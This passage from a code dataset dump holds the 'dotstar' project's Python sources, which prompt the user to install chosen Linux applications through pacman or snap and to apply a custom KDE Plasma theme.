lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"whyPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string y_id = res[0].as<string>();\n return y_id;\n\n}\n\n\nstring get_owner_id_of_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT owner_id FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string owner_id = res[0].as<string>();\n return owner_id;\n}\n\n\nstring get_truck_id_for_a_particular_status(connection * C, string status){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"truckId\\\" FROM \\\"upsApp_truck\\\" WHERE STATUS = \" + W.quote(status) + \" ORDER BY \\\"truckId\\\" ASC ;\";\n result R = W.exec(sql);\n string truck_id;\n result::const_iterator res = R.begin();\n if(res == R.end())\n return \"NULL\";\n else\n truck_id = res[0].as<string>();\n \n return truck_id;\n}\n\n\nstring get_username(connection *C , string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT owner_id FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string owner_id = res[0].as<string>();\n sql = \"SELECT username FROM auth_user WHERE id = \" + 
W.quote(owner_id) + \" ;\";\n R = W.exec(sql);\n res = R.begin();\n string username = res[0].as<string>();\n return username;\n}\n\n\n\nvoid insert_sequence_num(connection * C, string seq_num, string ackedornot){\n lock_guard<mutex> lock(c_mutex);\nwork W(*C);\nstring sql = \"INSERT INTO \\\"upsApp_sequence_number\\\"(sequence_id, ackedornot) VALUES (\" + W\\\n .quote(seq_num) + \" , \" + W.quote(ackedornot) + \");\";\nW.exec(sql);\nW.commit();\n}\n\n\nbool check_seq_num_exists(connection * C, string seq_num){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\nstring sql = \"SELECT * FROM \\\"upsApp_sequence_number\\\" WHERE sequence_id = \" + \\\nW.quote(seq_num) + \" ; \";\nresult R = W.exec(sql);\nresult::const_iterator res = R.begin();\n if(res == R.end())\n return false;\n else\n return true;\n}\n\n\n \n \n\nvoid update_package_destination(connection * C, string packageid, string new_x, string new_y){\n lock_guard<mutex> lock(c_mutex);\nstring sql;\nwork W(*C);\nsql = \"UPDATE \\\"upsApp_package\\\" SET \\\"xPosition\\\" = \" + W.quote(new_x) + \", \\\"yPosition\\\" = \" + W.quote(new_y) + \" WHERE \\\"packageId\\\" = \" +W.quote(packageid) + \" ;\";\nW.exec(sql);\nW.commit();\n}\n\nvoid update_package_warehouse_location_and_id(connection * C, string warehouse_id, string warehouse_x, string warehouse_y, string packageid){\n lock_guard<mutex> lock(c_mutex);\nstring sql;\nwork W(*C);\nsql = \"UPDATE \\\"upsApp_package\\\" SET WHID = \" + W.quote(warehouse_id) + \", \\\"whxPosition\\\" = \" + W.quote(warehouse_x) + \", \\\"whyPosition\\\" = \" + W.quote(warehouse_y) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\nW.exec(sql);\nW.commit();\n}\n\n\nvoid insert_package(connection * C, string packageid, string username, string truck_id, string item, string status = \"DG\", string warehouse_id = \"0\", string warehouse_x = \"0\" , string warehouse_y = \"0\", string x_position = \"0\", string y_position = \"0\", string destination_update = \"False\"){\n lock_guard<mutex> lock(c_mutex);\n string owner_id;\n if (!username.empty()) {\n owner_id = get_owner_id_from_username(C, username);\n }\n string sql;\n \n work W(*C);\n if(!username.empty()){\n cout << \"empty()\" << endl;\n cout << \"owner_id in sql \" << owner_id << endl;\n string space = \" , \";\n sql = \"INSERT INTO \\\"upsApp_package\\\"(\\\"packageId\\\", owner_id, truck_id, status, item, whid, \\\"whxPosition\\\",\\\"whyPosition\\\", \\\"xPosition\\\", \\\"yPosition\\\", \\\"destRequiredUpdated\\\" ) VALUES(\" + W.quote(packageid) + \" , \" + W.quote(owner_id) + \" , \" + W.quote(truck_id) + \" , \" + W.quote(status) + \" , \" + W.quote(item) + \" , \" + W.quote(warehouse_id) + \" , \" + W.quote(warehouse_x) + \" , \" + W.quote(warehouse_y) + \" , \" + W.quote(x_position) + \" , \" + W.quote(y_position) + \" , \" + W.quote(destination_update) + \");\";\n cout << sql << endl;\n }\n else{\n sql = \"INSERT INTO \\\"upsApp_package\\\"(\\\"packageId\\\",truck_id, status, item, whid, \\\"whxPosition\\\",\\\"whyPosition\\\", \\\"xPosition\\\", \\\"yPosition\\\", \\\"destRequiredUpdated\\\" ) VALUES(\" + W.quote(packageid) + \" , \" + W.quote(truck_id) + \" , \" + W.quote(status) + \" , \" + W.quote(item) + \" , \" + W.quote(warehouse_id) + \" , \" + W.quote(warehouse_x) + \" , \" + W.quote(warehouse_y) + \" , \" + W.quote(x_position) + \" , \" + W.quote(y_position) + \" , \" + W.quote(destination_update) + \");\";\n }\n try{\n W.exec(sql);\n }\n catch (const std::exception &e) {\n cerr << e.what() << std::endl;\n return;\n 
}\n\n W.commit();\n}\n\n\nvoid update_status_of_package (connection * C, string packageid, string new_status){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"UPDATE \\\"upsApp_package\\\" SET STATUS = \" + W.quote(new_status) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n W.exec(sql);\n W.commit();\n}\n\n\n//Complete truck related functions\nvoid insert_truck(connection * C, string truckid, string status){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"INSERT INTO \\\"upsApp_truck\\\"(\\\"truckId\\\",status) VALUES(\" + W.quote(truckid) + \" , \" + W.quote(status) + \");\";\n\n try{\n W.exec(sql);\n }\n catch (const std::exception &e) {\n cerr << e.what() << std::endl;\n return;\n }\n\n W.commit();\n}\n\n\nvoid update_truck_status(connection * C, string truck_id, string new_status){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"UPDATE \\\"upsApp_truck\\\" SET STATUS = \" + W.quote(new_status) + \" WHERE \\\"truckId\\\" = \" + W.quote(truck_id)+ \" ;\";\n W.exec(sql);\n W.commit();\n}\n\n string get_truck_status(connection * C, string truckid){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"SELECT STATUS FROM \\\"upsApp_truck\\\" WHERE \\\"truckId\\\" = \" + W.quote(truckid) + \" ; \";\n result R = W.exec(sql);\n string status;\n result::const_iterator res = R.begin();\n if(!(res == R.end()))\n status = res[0].as<string>();\n \n return status;\n\n}\n\n\n// void clear_all_tables(connection * C){\n\n// work W(*C);\n// string sql = \"TRUNCATE \\\"upsApp_sequence_number\\\", \\\"upsApp_order_table\\\", \\\"upsApp_current_world\\\", \\\"upsApp_truck\\\", \\\"upsApp_package\\\";\";\n// W.exec(sql);\n// W.commit();\n\n// }\n\n\nvoid clear_all_tables(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"TRUNCATE \\\"upsApp_sequence_number\\\", \\\"upsApp_order_table\\\", \\\"upsApp_current_world\\\", \\\"upsApp_truck\\\", \\\"upsApp_package\\\", \\\"auth_user\\\" CASCADE;\";\n W.exec(sql);\n W.commit();\n\n}\n\n\n\n" }, { "alpha_fraction": 0.6894645094871521, "alphanum_fraction": 0.6987776756286621, "avg_line_length": 31.72381019592285, "blob_id": "36d70548ddc493946ad9fdaea3657e83ebc62b22", "content_id": "1561271e8c5451874775e79e56d4a9cbd0d3705f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3438, "license_type": "no_license", "max_line_length": 80, "num_lines": 105, "path": "/Server-App/server/amazonMsg.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __AMAZONMSG__\n#define __AMAZONMSG__ \n\n#define LISTEN_PORT \"44444\"\n#define CONNECT_HOST \"vcm-5947.vm.duke.edu\"\n// #define CONNECT_HOST \"vcm-8273.vm.duke.edu\"\n#define CONNECT_PORT \"22222\"\n\n#include \"UA.pb.h\"\n#include \"socket.hpp\"\n#include <string.h>\n#include <cstdlib>\n#include <cstdio>\n#include <google/protobuf/message.h>\n#include <google/protobuf/descriptor.h>\n#include <google/protobuf/io/zero_copy_stream_impl.h>\n#include <google/protobuf/io/coded_stream.h>\n#include <google/protobuf/io/zero_copy_stream_impl_lite.h>\n\nusing namespace std;\n\nclass amazonMsg {\n static Connector connector;\n static amazonMsg * instance;\n static google::protobuf::io::FileOutputStream * out;\n static google::protobuf::io::FileInputStream * in;\n static Listener listener;\n static google::protobuf::io::FileOutputStream * listenerOut;\n static google::protobuf::io::FileInputStream * listenerIn;\n static 
mutex mtx_connector_in;\n static mutex mtx_connector_out;\n static mutex mtx_listener_in;\n static mutex mtx_listener_out;\n static Socket tempListener;\n // -------------------------\npublic:\n static amazonMsg * getInstance();\nprivate: \n amazonMsg() {} // Constructor? (the {} brackets) are needed here.\npublic:\n amazonMsg(amazonMsg const&) = delete;\n void operator=(amazonMsg const&) = delete;\n bool buildConnection(int worldid);\n void pickUpRes(int seqnum, int tracknum, int orderid, int truckid);\n void deliverRes(int seqnum, int tracknum);\n void sendError(string err, int originseqnum, int seqnum);\n void sendAck(int ack);\n void receiveRes(A2URequest& req); \n void acceptConnection();\n void updateDestination(int seqnum, int tracknum, int new_x, int new_y);\n void receiveDestUpdatedRes(A2UResponse & response);\n void sendAck22222(int ack);\n \n //this is adapted from code that a Google engineer posted online\n template<typename T> bool sendMesgTo(const T & message,\n\t\t google::protobuf::io::FileOutputStream *out) {\n \n { //extra scope: make output go away before out->Flush()\n // We create a new coded stream for each message.\n // Don’t worry, this is fast.\n google::protobuf::io::CodedOutputStream output(out);\n // Write the size.\n const int size = message.ByteSize();\n output.WriteVarint32(size);\n uint8_t* buffer = output.GetDirectBufferForNBytesAndAdvance(size);\n if (buffer != NULL) {\n\t// Optimization: The message fits in one buffer, so use the faster\n\t// direct-to-array serialization path.\n\tmessage.SerializeWithCachedSizesToArray(buffer);\n } else {\n\t// Slightly-slower path when the message is multiple buffers.\n\tmessage.SerializeWithCachedSizes(&output);\n\tif (output.HadError()) {\n\t return false;\n\t}\n }\n }\n out->Flush();\n return true;\n }\n\n //this is adapted from code that a Google engineer posted online\n template<typename T> bool recvMesgFrom(T & message,\n\t\t google::protobuf::io::FileInputStream * in ){\n google::protobuf::io::CodedInputStream input(in);\n uint32_t size;\n if (!input.ReadVarint32(&size)) {\n return false;\n }\n // Tell the stream not to read beyond that size.\n google::protobuf::io::CodedInputStream::Limit limit = input.PushLimit(size);\n // Parse the message.\n if (!message.MergeFromCodedStream(&input)) {\n return false;\n }\n if (!input.ConsumedEntireMessage()) {\n return false;\n }\n // Release the limit.\n input.PopLimit(limit);\n return true;\n }\n};\n \n#endif\n" }, { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 19.5, "blob_id": "fd013a823fdac79cfc326db647e9a94b2af9a41a", "content_id": "0cfea6f41e6ded1ab8f06343bff3718c7518c599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 34, "num_lines": 8, "path": "/Django-App/web-app/upsApp/admin.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Package, Truck\n\n\n# Register your models here.\n\nadmin.site.register(Package)\nadmin.site.register(Truck)\n" }, { "alpha_fraction": 0.7882353067398071, "alphanum_fraction": 0.8117647171020508, "avg_line_length": 21.5, "blob_id": "6d3bd00c6e9ca905497a9915f5569b920dc5dac1", "content_id": "6d747f1bdcf40dea447c37f52f415c8d423edb08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 85, "license_type": "no_license", "max_line_length": 28, "num_lines": 
4, "path": "/Server-App/server/Dockerfile", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "FROM jingru96/ups_server:ups\nRUN mkdir /serverDir\nWORKDIR /serverDir\nADD . /serverDir" } ]
23
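The pqxx helpers in handle_requests.cpp above all follow one pattern: take the global c_mutex, open a transaction with work W(*C), build the statement by concatenating W.quote() fragments, execute, and commit. For comparison, here is a minimal Python sketch of the same guarded-transaction idea; psycopg2, the conn argument, and the helper name are assumptions for illustration, not part of the UPS repo:

import threading
import psycopg2  # assumed driver for this sketch; the repo itself uses C++ libpqxx

_db_lock = threading.Lock()  # plays the role of c_mutex in handle_requests.cpp

def get_package_status(conn, package_id):
    # One lock + one transaction per call, mirroring the C++ helpers.
    with _db_lock, conn, conn.cursor() as cur:
        # Driver-side parameter binding replaces the manual W.quote() concatenation.
        cur.execute('SELECT status FROM "upsApp_package" WHERE "packageId" = %s',
                    (package_id,))
        row = cur.fetchone()
        return row[0] if row else None

Parameter binding also avoids the spacing pitfalls of hand-built SQL, such as the missing space before AND in the UPDATE statement of get_parameter_based_on_dest above.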
MonuKumar0/scrapper
https://github.com/MonuKumar0/scrapper
3dd4dfca73fb91ec399eaf3f94480b556ecc82ae
b065caf76113de3ba4396874f6a5894ab631845c
21aa86e8adf10176cf7ab40d0caa4b7313341766
refs/heads/master
2021-09-03T00:10:18.817643
2018-01-04T07:29:02
2018-01-04T07:29:02
116,228,589
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5958747267723083, "alphanum_fraction": 0.6073338389396667, "avg_line_length": 27.9777774810791, "blob_id": "7b32618fe123ed158cc1174d405b69e579fcc2f2", "content_id": "75d04ab85ba796797f1ccd27b055d38994acb500", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1309, "license_type": "no_license", "max_line_length": 103, "num_lines": 45, "path": "/simpleapp.py", "repo_name": "MonuKumar0/scrapper", "src_encoding": "UTF-8", "text": "from flask import Flask\nimport sys \nimport optparse\nimport time\nimport json\nimport urllib\nfrom bs4 import BeautifulSoup\n\n\napp=Flask(__name__)\nstart=int(round(time.time()))\n\[email protected](\"/\")\ndef hello_world():\n url=\"https://www.codechef.com/contests\"\n page=urllib.request.urlopen(url)\n soup=BeautifulSoup(page,\"lxml\")\n mydivs=soup.find_all(\"table\",{\"class\" : \"dataTable\"})\n ln=len(mydivs)\n link=[]\n name=[]\n start=[]\n end=[]\n for i in range(0,(ln-1)):\n tbody=mydivs[i].find(\"tbody\")\n trs=tbody.findAll(\"tr\")\n ln2=len(trs)\n for j in range (0,ln2):\n tds=trs[j].findAll(\"td\")\n link.append(\"/\"+tds[0].string)\n name.append(tds[1].string)\n start.append(tds[2][\"data-starttime\"])\n end.append(tds[3][\"data-endtime\"]) \n contest={\"result\":[{\"link\":l,\"name\":n,\"start\":s,\"end\":e} for l,n,s,e in zip(link,name,start,end)]} \n return json.dumps(contest)\n\n\nif __name__=='__main__':\n parser=optparse.OptionParser(\"usage=simpleapp.py -p\")\n parser.add_option('-p','--port',action='store',dest='port',help='The port to listen on.')\n (args, _)=parser.parse_args()\n if args.port==None:\n print (\"Missing required arguments: -p/--port\")\n sys.exit(1)\n app.run(host='0.0.0.0',port=int(args.port),debug=False)\n \n" } ]
1
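simpleapp.py above scrapes the CodeChef contests table with BeautifulSoup and serves it as JSON on the root route. A minimal client sketch, assuming the server was started locally with "python simpleapp.py -p 5000" (the port number is arbitrary):

import json
import urllib.request

# Query the root route served by simpleapp.py (assumed to be running locally).
with urllib.request.urlopen("http://127.0.0.1:5000/") as resp:
    contests = json.load(resp)

# Each entry carries the fields built in hello_world(): link, name, start, end.
for contest in contests["result"]:
    print(contest["name"], contest["start"], "->", contest["end"])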
le-chartreux/dotstar
https://github.com/le-chartreux/dotstar
0e2d4572aecb2145b1381f728a6b57fe2c881818
3448d0053796955d75bfaae28ae702aff449841f
c1f423fbbdc78b22f05370a9bfa15d280d577d14
refs/heads/master
2023-05-06T00:11:14.656842
2021-05-24T13:03:37
2021-05-24T13:03:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5589473843574524, "alphanum_fraction": 0.5621052384376526, "avg_line_length": 35.53845977783203, "blob_id": "52638231f8594616d0e913620c83d04c73bf6ce0", "content_id": "96dbae754f5777df5965f77204281ae23d242b0b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2850, "license_type": "permissive", "max_line_length": 107, "num_lines": 78, "path": "/src/applications/application.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from typing import Optional\nfrom colorama import Fore # for colors of the output\n\nimport ui\nfrom applications.package_manager import PackageManager\n\n\nclass Application:\n \"\"\"\n Class that describes entities of applications.json\n \"\"\"\n def __init__(\n self,\n name: str,\n description: str,\n comment: str,\n url: str,\n paid: bool,\n pms: dict[PackageManager, str]\n ) -> None:\n self.name = name\n self.description = description\n self.comment = comment\n self.url = url\n self.paid = paid\n self.pms = pms\n\n def print_informations(self) -> None:\n \"\"\"\n Print all the informations about the app.\n \"\"\"\n ui.print_description(\"Application name: \" + self.name)\n ui.print_description(\"Description: \" + self.description)\n ui.print_description(\"Comment: \" + self.comment)\n ui.print_description(\"URL: \" + self.url)\n ui.print_description(\"Paid: \" + (\"yes\" if self.paid else \"no\"))\n\n # print all the possibles pm inline\n supported_pm = \"\"\n for possible_pm in self.pms.keys():\n supported_pm += possible_pm.system_name + \" \"\n ui.print_description(\"Supported package managers: \" + str(supported_pm))\n\n def ask_for_installation(self) -> bool:\n \"\"\"\n Ask to the user if they want to install the applications\n :return: if the user wants to install the applications\n \"\"\"\n install_application_choice = ui.ask(\"Do you want to install \" + self.name + \"? 
(y/N): \")\n return install_application_choice in (\"y\", \"Y\")\n\n def ask_pm(self, usable_pms: dict[str, PackageManager]) -> Optional[PackageManager]:\n \"\"\"\n Ask to the user witch PM use for the installation\n :return: the PM to use, or None if cancel\n \"\"\"\n possibles_pm = list(set(self.pms.keys()) & set(usable_pms.values()))\n choice = 0\n\n while not 1 <= choice <= len(possibles_pm):\n ui.print_information(\"Possible package managers:\")\n for index in range(len(possibles_pm)):\n ui.print_description(\n str(index + 1) + \": \" + possibles_pm[index].system_name\n )\n choice = ui.ask(\n \"Enter the number of the package manager you want to use (-1 to cancel the installation): \"\n )\n if choice == \"-1\":\n ui.print_error(\"Installation canceled\")\n return None\n elif not (choice.isnumeric() and 1 <= int(choice) <= len(possibles_pm)):\n ui.print_error(\"Error: please enter a number between %d and %d\" % (1, len(possibles_pm)))\n choice = 0\n else:\n choice = int(choice)\n\n return possibles_pm[choice - 1]\n" }, { "alpha_fraction": 0.6444833874702454, "alphanum_fraction": 0.6444833874702454, "avg_line_length": 44.68000030517578, "blob_id": "8316a7f32d29b3c57ac29555075e4573549c6a21", "content_id": "27e2249cb3ac77006963c167394651d77b19ec39", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1142, "license_type": "permissive", "max_line_length": 119, "num_lines": 25, "path": "/src/applications/package_manager.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "class PackageManager:\n \"\"\"\n An object that contains the name used by dotstar and the true name of the PM (the one used by the OS, that dotstar\n calls when installing).\n dotstar don't uses the same name as the OS because snap has two mods of installation (sandbox and classic)\n so we have to differentiate them.\n Contains too the command shape, a string with a %s placeholder\n \"\"\"\n def __init__(\n self,\n dotstar_name: str,\n system_name: str,\n command_shape: str,\n multiple_apps_query_support: bool\n ) -> None:\n \"\"\"\n :param dotstar_name: the name of the PM that dotstar uses\n :param system_name: the name of the PM that the OS uses\n :param command_shape: the shape of the command. 
Must have a %s placeholder\n        :param multiple_apps_query_support: whether the PM supports queries with multiple names (like \"pacman -Sy atom gedit\")\n        \"\"\"\n        self.dotstar_name = dotstar_name\n        self.system_name = system_name\n        self.command_shape = command_shape\n        self.multiple_apps_query_support = multiple_apps_query_support\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 23.615385055541992, "blob_id": "e02493e96bfabfea8a058fff8b1ee652808fb169", "content_id": "b16b82cd6b61947dc1cb2e54fbbcca162658af7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "permissive", "max_line_length": 63, "num_lines": 13, "path": "/src/res.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from os import path\n\n\nWORKING_DIR = path.dirname(__file__)\nRES_DIR = path.join(WORKING_DIR, \"..\", \"res\")\n\n\ndef get_absolute_res_path(res_path: str) -> str:\n    \"\"\"\n    :param res_path: path to a resource from the res directory\n    :return: absolute path to the resource\n    \"\"\"\n    return path.join(RES_DIR, res_path)\n" }, { "alpha_fraction": 0.7055837512016296, "alphanum_fraction": 0.7055837512016296, "avg_line_length": 48.25, "blob_id": "3e659f0dd4c60297349a9f745535fe2f022d3248", "content_id": "a660002ac4e1ae59be573567a2a5c55a9e4e467b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 394, "license_type": "permissive", "max_line_length": 99, "num_lines": 8, "path": "/src/applications/constants.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from applications.package_manager import PackageManager\n\n# Package managers that the application can use.\nSUPPORTED_PMS = {\n    \"pacman\": PackageManager(\"pacman\", \"pacman\", \"sudo pacman -Sy %s\", True),\n    \"snap sandbox\": PackageManager(\"snap sandbox\", \"snap\", \"sudo snap install %s\", True),\n    \"snap classic\": PackageManager(\"snap classic\", \"snap\", \"sudo snap install %s --classic\", False)\n}\n" }, { "alpha_fraction": 0.6010498404502869, "alphanum_fraction": 0.6010498404502869, "avg_line_length": 40.563636779785156, "blob_id": "0fb4c4b1db9d28f5482065df73f6466034829ca3", "content_id": "52a5f702e47a80d5f537cf3d071dbb537dfd2452", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2286, "license_type": "permissive", "max_line_length": 117, "num_lines": 55, "path": "/src/main.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "import os  # for getting the DE\n\nimport applications.utilities as app_utils\nimport theme.kde as kde\nimport res\nimport constants\nimport ui\n\n\ndef main() -> None:\n\n    # Application part\n    install_applications_choice = ui.ask(\"Do you want to install applications? (y/N): \")\n    if install_applications_choice in (\"y\", \"Y\"):\n        application_store = app_utils.read_application_store(res.get_absolute_res_path(\"applications.json\"))\n\n        usable_pms = app_utils.get_usable_pms()\n        installation_dict = app_utils.create_installation_dict(usable_pms)\n\n        for category_name in application_store:\n            see_category_choice = ui.ask(\n                \"Do you want to see available applications from the <\" + category_name + \"> category? 
(y/N): \"\n )\n if see_category_choice in (\"y\", \"Y\"):\n for application in application_store[category_name]:\n ui.print_delimiter()\n application.print_informations()\n install_it = application.ask_for_installation()\n if install_it:\n pm = application.ask_pm(usable_pms)\n if pm is not None:\n installation_dict[pm].append(application.pms[pm])\n\n ui.print_delimiter()\n ui.print_information(\"Installation on the selected apps...\")\n app_utils.install_apps(installation_dict)\n ui.print_information(\"End of the installation part.\")\n\n # Apparence part\n ui.print_delimiter()\n user_de = os.environ[\"DESKTOP_SESSION\"]\n if user_de in constants.SUPPORTED_DE:\n if ui.ask(\n \"Your desktop environment is compatible with the customization. Do you want to customize it? (y/N): \"\n ) in (\"Y\", \"y\"):\n ui.print_information(\n \"My custom theme \\\"Sweet-Layan-mashup\\\", a mashup of my two favorites KDE themes \"\n + \"(Sweet by EliverLara and Layan by Vince Liuice, plus Papirus icon theme) will be install.\"\n + \"You can return to your previous theme by going to apparence/ in the KDE setting app.\"\n )\n kde.install_kde_theme(\"Sweet-Layan-mashup\", res.get_absolute_res_path(\"theme/KDE/Sweet-Layan-mashup\"))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6244245171546936, "alphanum_fraction": 0.6253937482833862, "avg_line_length": 41.11224365234375, "blob_id": "ab4ecf7f1f020dac4cd11311a32b0f9ed5ad9a44", "content_id": "4c741f0a87b6cfa45f05ce0a42e9ada4563e817e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4127, "license_type": "permissive", "max_line_length": 112, "num_lines": 98, "path": "/src/applications/utilities.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "import os\nimport json\n\nimport ui\n\nimport applications.constants as app_constants\nfrom applications.application import Application\nfrom applications.package_manager import PackageManager\n\n\ndef read_application_store(filename: str) -> dict[str, list[Application]]:\n \"\"\"\n Extracts the applications from the asked file\n\n :param filename: name of the file where the applications are stored (json)\n :return: a dictionary of applications with the name of each category as a key (Text editors for example) and\n the list of applications in this category as a value\n \"\"\"\n with open(filename, \"r\") as applications_file:\n all_application_data = json.load(applications_file)\n\n # application_store is a dictionary of applications with\n # - the name of each category as a key (Text editors for example)\n # - the list of applications in this category as a value\n application_store: dict[str, list[Application]] = {}\n\n # filling the application store from the JSON\n for category_name in all_application_data:\n for this_application_data in all_application_data[category_name]:\n # if the category is missing we add it\n if category_name not in application_store.keys():\n application_store[category_name] = []\n\n available_pm_for_this_app: dict[PackageManager, str] = {}\n for pm_name in this_application_data[\"PMs\"]:\n available_pm_for_this_app[\n app_constants.SUPPORTED_PMS[pm_name]\n ] = this_application_data[\"PMs\"][pm_name]\n\n # adding a new Application in the list of the tag\n application_store[category_name].append(\n Application(\n this_application_data[\"name\"],\n this_application_data[\"description\"],\n this_application_data[\"comment\"],\n this_application_data[\"url\"],\n 
this_application_data[\"paid\"],\n available_pm_for_this_app\n )\n )\n return application_store\n\n\ndef get_usable_pms() -> dict[str, PackageManager]:\n \"\"\"\n Look for supported package managers that are usable on the user's computer\n\n :return: a dict of usable PackageManager, with their dotstar name as key\n \"\"\"\n usable_pms = dict()\n for supported_pm_name in app_constants.SUPPORTED_PMS.keys():\n command_to_check_existence = \\\n \"type \" + app_constants.SUPPORTED_PMS[supported_pm_name].system_name \\\n + \" > /dev/null 2>&1\"\n if os.system(command_to_check_existence) == 0:\n usable_pms[supported_pm_name] = app_constants.SUPPORTED_PMS[supported_pm_name]\n\n return usable_pms\n\n\ndef create_installation_dict(usable_pm: dict[str, PackageManager]) -> dict[PackageManager, list[str]]:\n \"\"\"\n :return: a dict with each usable PackageManager as key and an empty list as value\n \"\"\"\n installation_dict: dict[PackageManager, list[str]] = {}\n for pm in usable_pm.values():\n installation_dict[pm] = []\n\n return installation_dict\n\n\ndef install_apps(installation_dict: dict[PackageManager, list[str]]) -> None:\n \"\"\"\n Installs all the given apps with their respective package manager\n\n :param installation_dict: a dict with usable PackageManager as key and a list of application names as value\n \"\"\"\n for pm in installation_dict.keys():\n if pm.multiple_apps_query_support and len(installation_dict[pm]) > 0:\n all_apps_to_install = \" \".join(installation_dict[pm])\n command = pm.command_shape % all_apps_to_install\n ui.print_information(\"The following installation command will be executed: \" + command)\n ui.exec_system(command)\n else:\n for app_name in installation_dict[pm]:\n command = pm.command_shape % app_name\n ui.print_information(\"The following installation command will be executed: \" + command)\n ui.exec_system(command)\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20, "blob_id": "3bcdd26c38a109a89f0d8f55facd2413980be849", "content_id": "c52015d2c7f8fc127fb6742c6288cc37ba57beb0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "permissive", "max_line_length": 25, "num_lines": 2, "path": "/src/constants.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "# customisation\nSUPPORTED_DE = {\"plasma\"}\n" }, { "alpha_fraction": 0.6743948459625244, "alphanum_fraction": 0.6767814755439758, "avg_line_length": 43.43939208984375, "blob_id": "d0fa67c36da0a6a279934d44a3b4826681705fae", "content_id": "1c538e9c68bd54c7a643e89312583ee6dfd70462", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2933, "license_type": "permissive", "max_line_length": 115, "num_lines": 66, "path": "/src/theme/kde.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "import subprocess # for executing some commands\nimport os\n\nimport ui\n\nCURRENT_DIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n\ndef install_kde_theme(theme_name: str, theme_folder_path: str) -> None:\n \"\"\"\n Check that every needed software is here, then start to install the KDE theme\n \"\"\"\n\n # Checking that every command is available\n commands_to_check = [\"kpackagetool5\", \"lookandfeeltool\", \"wget\", \"tar\"]\n for command in commands_to_check:\n check_command = \"type \" + command + \" > /dev/null 2>&1\"\n # The execution will return 0 if present, else an 
other number. So it's not bool(command)\n command_available = not bool(ui.exec_system(check_command))\n\n if not command_available:\n ui.print_error(\"Error: \" + command + \" is needed but not find. Theme install canceled.\")\n return\n\n # looking if the theme is already installed, and deleting it if yes\n check_install_result = subprocess.run(['lookandfeeltool', '-l'], stdout=subprocess.PIPE)\n already_installed = theme_name in check_install_result.stdout.decode(\"utf-8\")\n if already_installed:\n ui.print_information(theme_name + \" already installed. Deleting...\")\n delete_command = \"kpackagetool5 -r \" + theme_folder_path\n delete_failed = bool(ui.exec_system(delete_command))\n if delete_failed:\n ui.print_error(\"Error: impossible to delete the theme.\")\n return\n\n # INSTALLATION OF THE DEPENDENCIES\n ui.print_information(\"Installation of the dependencies...\")\n dependencies_installation_failed = bool(ui.exec_system(\"sh %s/install_theme_components.sh\" % CURRENT_DIR_PATH))\n if dependencies_installation_failed:\n ui.print_error(\"Error: impossible to install all the needed dependencies.\")\n return\n\n print()\n 